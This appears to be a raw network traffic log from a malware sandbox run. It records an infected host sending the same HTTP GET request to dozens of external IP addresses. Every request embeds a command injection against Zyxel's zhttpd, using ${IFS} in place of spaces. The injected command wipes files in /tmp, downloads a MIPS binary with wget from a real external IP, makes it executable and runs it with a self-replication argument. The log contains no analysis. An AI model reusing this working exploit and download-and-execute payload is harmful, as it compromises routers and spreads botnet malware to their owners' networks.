                                    Jan 13, 2024 19:02:42.367808104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6377192.168.2.1351276178.97.121.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367875099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6378192.168.2.1356806129.4.148.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.367949009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6379192.168.2.1358150157.53.119.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368016005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6380192.168.2.1345932133.78.5.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368067980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6381192.168.2.1345546170.51.165.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368145943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6382192.168.2.1338476220.82.123.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368204117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6383192.168.2.134076436.119.73.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368263960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6384192.168.2.134071460.92.240.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368344069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6385192.168.2.134268283.207.228.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368406057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6386192.168.2.133316632.203.187.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368514061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6387192.168.2.1336642140.33.129.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368557930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6388192.168.2.135526424.28.30.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368621111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6389192.168.2.133832464.192.170.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368695974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6390192.168.2.1358280171.182.197.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368726015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6391192.168.2.135437493.103.161.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368792057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6392192.168.2.135596668.94.193.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368845940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6393192.168.2.135019269.9.184.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368911982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6394192.168.2.1349776125.238.41.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.368946075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6395192.168.2.1340270170.224.40.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369007111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6396192.168.2.1348860198.118.70.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369039059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6397192.168.2.1346370103.20.234.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369127989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6398192.168.2.135409036.27.40.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369163990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6399192.168.2.135378897.67.185.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369232893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6400192.168.2.134869044.23.222.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369288921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6401192.168.2.1347284217.175.10.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369342089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6402192.168.2.135014041.210.152.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369393110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6403192.168.2.13329121.198.41.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369424105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6404192.168.2.134594025.52.36.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369513035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6405192.168.2.1351194152.214.131.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369554043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6406192.168.2.13449245.78.161.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369606972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6407192.168.2.1358158178.67.239.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369673014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6408192.168.2.1333380189.35.193.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369728088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6409192.168.2.1346680104.224.140.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369775057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6410192.168.2.133992818.152.6.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369839907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6411192.168.2.1345646144.63.197.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369899988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6412192.168.2.1358844104.210.112.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369945049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6413192.168.2.1343512110.131.174.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.369992018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6414192.168.2.134652839.162.14.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370070934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6415192.168.2.134207425.199.133.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370134115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6416192.168.2.1354210158.94.161.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370212078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6417192.168.2.1340500131.109.153.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370249987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6418192.168.2.1355798185.108.96.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370313883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6419192.168.2.1353410192.244.126.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370378017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6420192.168.2.135290438.12.153.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370439053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6421192.168.2.1359774191.10.192.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370491028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6422192.168.2.136040635.240.170.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370564938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6423192.168.2.1359426172.84.219.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370615005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6424192.168.2.1336488185.168.226.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370661020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6425192.168.2.1349970118.231.161.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370718002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6426192.168.2.135104273.178.65.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370796919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6427192.168.2.1350406189.123.131.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370820999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6428192.168.2.1339768182.97.40.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370897055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6429192.168.2.1358340164.128.65.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.370946884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6430192.168.2.1355190151.54.110.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371023893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6431192.168.2.1344766175.222.171.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371083021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6432192.168.2.134933679.18.6.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371150970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6433192.168.2.1338298204.246.44.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371200085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6434192.168.2.1334640113.88.84.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371274948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6435192.168.2.134874052.7.192.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371345043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6436192.168.2.1359532175.24.99.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371416092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6437192.168.2.1339086218.100.149.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371467113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6438192.168.2.135450212.19.49.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371536016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6439192.168.2.133329248.208.101.166443
                                    TimestampBytes transferredDirectionData
